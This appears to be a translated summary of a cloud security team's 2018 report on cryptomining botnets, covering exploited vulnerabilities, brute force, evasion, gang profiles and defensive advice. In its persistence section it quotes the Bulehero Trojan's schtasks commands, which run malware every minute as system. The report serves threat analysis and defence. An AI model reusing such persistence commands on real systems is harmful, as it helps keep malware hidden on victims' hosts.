2018 Cloud Mining Analysis Report

Recently, the Alibaba Cloud Security Team released the "2018 Cloud Mining Analysis Report". Based on Alibaba Cloud's 2018 attack and defense data, the report analyzed the malicious mining situation and put forward reasonable security protection suggestions for individuals and enterprises.

The report pointed out that although the price of cryptocurrencies experienced a sharp drop in 2018, mining is still the most direct means for cyber criminal gangs to realize their profits after invading servers. More and more 0-Day/N-Day vulnerabilities are used for intrusion and mining within a very short time after being announced. The trend of criminal gangs using vulnerabilities to launch attacks for mining will continue.

1. Attack Situation Analysis

1. Hot 0-Day/N-Day vulnerability exploits have become the "arsenal" of mining gangs, and the window period for users to fix 0-Day vulnerabilities has become shorter.

In 2018, a number of widely used web applications exposed high-risk vulnerabilities, posing a serious threat to Internet security. Afterwards, the security community analyzed the vulnerability information and shared the vulnerability details, making it easy to obtain the exploit code from the Internet. Mining gangs will naturally not let go of these readily available "arsenals". In addition, some N-Day vulnerabilities that have not been widely fixed are often exploited by mining gangs. This report sorts out some hot 0-Day/N-Day vulnerabilities that have been widely exploited by mining gangs.

At the same time, Alibaba Cloud has observed that the time interval between the disclosure of 0-Day vulnerabilities and their large-scale exploitation is getting shorter and shorter . Therefore, users who fail to fix high-risk 0-Day vulnerabilities in time after they are exposed are likely to become victims of malicious mining.

2. Non-web network applications exposed to the public network have become a major target for mining gangs

Enterprises have paid enough attention to the security threats that web applications may cause. Security products such as WAF, RASP, and vulnerability scanning have also improved the security level of web applications. However, non-web network applications (Redis, Hadoop, SQLServer, etc.) are often not core applications of enterprises. Enterprises do not invest as much in security reinforcement and vulnerability repair as web applications, which often leads to high-risk vulnerabilities that continue to remain unrepaired. Therefore, mining gangs will also take targeted advantage of these persistent weak applications on the Internet. This report sorts out the timeline of non-web network application vulnerabilities being exploited by mining gangs in 2018.

3. Mining gangs widely use brute force to spread, and weak passwords are still the main threat facing the Internet

The following figure shows the percentage of different applications that have been hacked into and used for mining. It can be seen that SSH/RDP/SQLServer are the key applications used for mining, and these applications are usually hacked and infected with mining viruses because of weak passwords being cracked by brute force. This shows that identity authentication problems caused by weak passwords are still an important threat facing the Internet.

2. Malicious Behavior

1. Mining backdoors are commonly spread through worms

After infecting victim hosts with mining Trojans, most mining gangs will control these victim hosts to scan and attack other hosts on the local network and the Internet, thereby expanding the number of infections. These mining Trojans spread quickly and are difficult to eradicate on the Internet, because once a small number of hosts are infected with malicious programs, they will be controlled to attack other hosts, causing other hosts with vulnerabilities or configuration problems to quickly fall.

A small number of mining gangs will directly control some hosts to carry out network attacks. After invading the victim host, they will only implant a mining backdoor in the host and will not spread it further. The most representative one is the 8220 mining gang. This type of gang generally has a rich variety of vulnerability exploitation methods and a fast vulnerability update speed.

2. Mining gangs will maximize their profits by persisting on the victim host

Most mining gangs will try to persist on the victim host to obtain maximum benefits.

Usually in Linux systems, mining gangs use crontab to set periodic execution instructions. In Windows systems, mining gangs usually use schtask and WMI to achieve persistence.

The following is the schtask command that Bulehero Trojan executes to add a periodic task:

 cmd /c schtasks /create /sc minute /mo 1 /tn "Miscfost" /ru system /tr "cmd /c C:\Windows\ime\scvsots.exe"cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\scvsots.exe /p everyone:F"

3. Mining gangs will evade security analysis and tracing by disguising processes, adding shells, obfuscating codes, setting up private mining pools or proxies, etc.

The virus downloader process used by the Bulehero mining network is named scvsots.exe, which is very similar to the name of a normal Windows program, svchost.exe. Other botnets also use malicious program names that resemble normal programs, such as taskhsot.exe, taskmgr.exe, and java.

During the analysis of the mining botnet, we found that most backdoor binary programs were packed with shells. The most commonly used ones are UPX, VMP, sfxrar, etc. under Windows. As shown in the figure below, almost every malicious program used by RDPMiner is packed with one of the above three shells.

In addition, the malicious scripts used by mining gangs are often obfuscated in various ways. As shown in the figure below, the JBossMiner mining botnet uses obfuscation and encryption in its vbs malicious script.

Although manual analysis can be done through a variety of means to obfuscate or decrypt, encryption and obfuscation are still very effective means of evading antivirus software.

Malicious mining groups use their own wallet addresses to connect to public mining pools, which may be blocked due to complaints received by the mining pools. Mining groups tend to use mining pool proxies or private mining pools to mine. As a result, it is difficult for security researchers to estimate the number and scale of compromised hosts through the hashrate and payment history published by the mining pools.

III. Overview of mainstream gangs

1. DDG mining gang

Since it was first exposed at the end of 2017, the DDG mining botnet has maintained a very high level of activity. Its main malicious program is written in the Go language, which objectively creates certain obstacles for security personnel to study and analyze. Frequent program configuration changes and technical upgrades make it the most harmful mining botnet in 2018.

DDG (3019) module structure and function

2. 8220 mining group

Among many mining botnets, the mining Trojan of the 8220 group is unique because it does not use a worm-like method to spread, but directly exploits vulnerabilities.

Theoretically, this method spreads more slowly and is more difficult to survive than botnets that spread through worm-like methods. However, the 8220 mining gang still managed to obtain a large amount of infection in this way.

Mining network structure

3. Mykings (theHidden) mining gang

The Mykings (also known as theHidden) mining network was mentioned and reported by many friendly companies in mid-2017. It has appeared since 2014, and the botnet is still active today, which can be said to have a very strong vitality. The botnet is extremely complex and integrates the functions of malicious programs such as Mirai and Masscan. In addition, extremely complex encryption and obfuscation technology is used in the payload and BypassUAC parts to conceal the attack intentions and evade the detection of security software and the analysis of security researchers. At the end of November, the mining botnet was found to have joined forces with "Dark Cloud", and its harm has increased again.

Mining network structure

4. Bulehero mining gang

Mining network structure

5. RDPMiner mining group

The mining botnet began to spread in October 2018 and has since changed the name of its mining program several times.

Mining network structure

6. JbossMiner mining group

In March 2018, Alibaba Cloud Security Team reported that it had captured a JbossMiner malicious program sample from a honeypot. The sample was packaged with py2exe, and after unpacking and decompilation, it turned out to be a complete attack program written in Python, including dozens of files such as source code and dependent libraries. There are different exploits for Windows and Linux victim hosts.

Mining network structure

7. WannaMine

WannaMine is a worm-type botnet. The mining gang's strategy was once described by CrowdStrike as "living off the land," because the malicious program on the infected host will first try to log in to other hosts using the password collected by Mimikatz, and then use the "EternalBlue" vulnerability to attack other hosts and propagate after failing.

Mining network structure

8. Kworkerd

This is a mining botnet that mainly attacks the unauthorized access vulnerability of the Redis database. It is named because it disguises the name of the mining program as the normal Linux process Kworkerd.

This Trojan only exploits one vulnerability but still causes a lot of infections, which shows that database security configuration needs to be taken seriously by users.

9. DockerKiller

As the popularity of microservices continues to rise, more and more companies are choosing containers to deploy their applications. However, as the preferred container for implementing microservices, Docker has not received enough attention for its security during large-scale deployment. In August 2018, unauthorized access vulnerabilities caused by improper Docker configuration were exploited in large quantities by mining gangs.

Mining network structure

4. Safety Recommendations

Although the price of coins is low now, the economic situation is under downward pressure, which may provide incentives for potential criminal activities. Alibaba Cloud predicts that the number of mining activities will remain at a high level in 2019; and as the knowledge related to mining and vulnerability exploitation becomes more popular, the number of malicious mining players may stabilize with a small increase.

Based on this situation, the Alibaba Cloud Security Team provides the following security recommendations for enterprises and individuals:

The weakest link in a security system is people, and the biggest security problem is often caused by people's laziness. Therefore, weak passwords and blasting account for half of the reasons for mining. Whether it is a company or an individual, security awareness education is essential;

The window period for 0-Day vulnerability repair is getting shorter and shorter. Enterprises need to improve the efficiency of vulnerability emergency response. On the one hand, they should actively update application systems, and on the other hand, they should pay attention to product security announcements and upgrade them in a timely manner. At the same time, they can also choose to purchase security hosting services to improve their own security level.

With the convenience brought by the elastic computing resources on the cloud, the risk of exposure of some non-Web network applications has also increased. Security operation and maintenance personnel should focus on the security risks associated with non-Web applications, or choose to purchase firewall products with IPS functions to provide protection for 0-Day vulnerabilities as soon as possible.